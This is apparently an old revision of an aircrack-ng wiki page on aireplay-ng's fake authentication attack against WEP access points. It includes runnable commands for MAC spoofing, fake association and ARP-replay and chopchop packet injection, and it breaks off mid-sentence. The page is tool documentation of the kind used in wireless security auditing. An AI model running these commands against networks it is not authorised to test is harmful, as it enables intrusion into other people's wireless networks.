This is an old revision of the document!
This attack is only useful when you need an associated MAC address in attacks 2, 3, 4 (-h option) and there is currently no associated client. However it is genereally better to use the MAC address of a real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The fake auth attack does NOT generate ARP requests.
Also, subsequent attacks will likely perform better if you update the MAC address of the card, so that it properly sends ACKs:
ifconfig ath0 down ifconfig ath0 hw ether 00:11:22:33:44:55 ifconfig ath0 up
aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 12:14:06 Sending Authentication Request 12:14:06 Authentication successful 12:14:06 Sending Association Request 12:14:07 Association successful :-)
With patched madwifi-old CVS 2005-08-14, it's possible to inject packets while in Managed mode (the WEP key itself doesn't matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface:
ifconfig ath0 down hw ether 00:11:22:33:44:55 iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA ifconfig ath0 up
sysctl -w dev.ath0.rawdev=1 ifconfig ath0raw up airodump-ng ath0raw out 6
Then you can run attack 3 or 4 (aireplay-ng will automatically replace ath0 with ath0raw below):
aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0
Some access points require to reassociate every 30 seconds, otherwise our fake client is considered disconnected. In this case, setup the periodic re-association delay:
aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
If this attacks seems to fail (aireplay-ng keeps sending authentication requests), MAC address filtering may be in place. Also make sure that: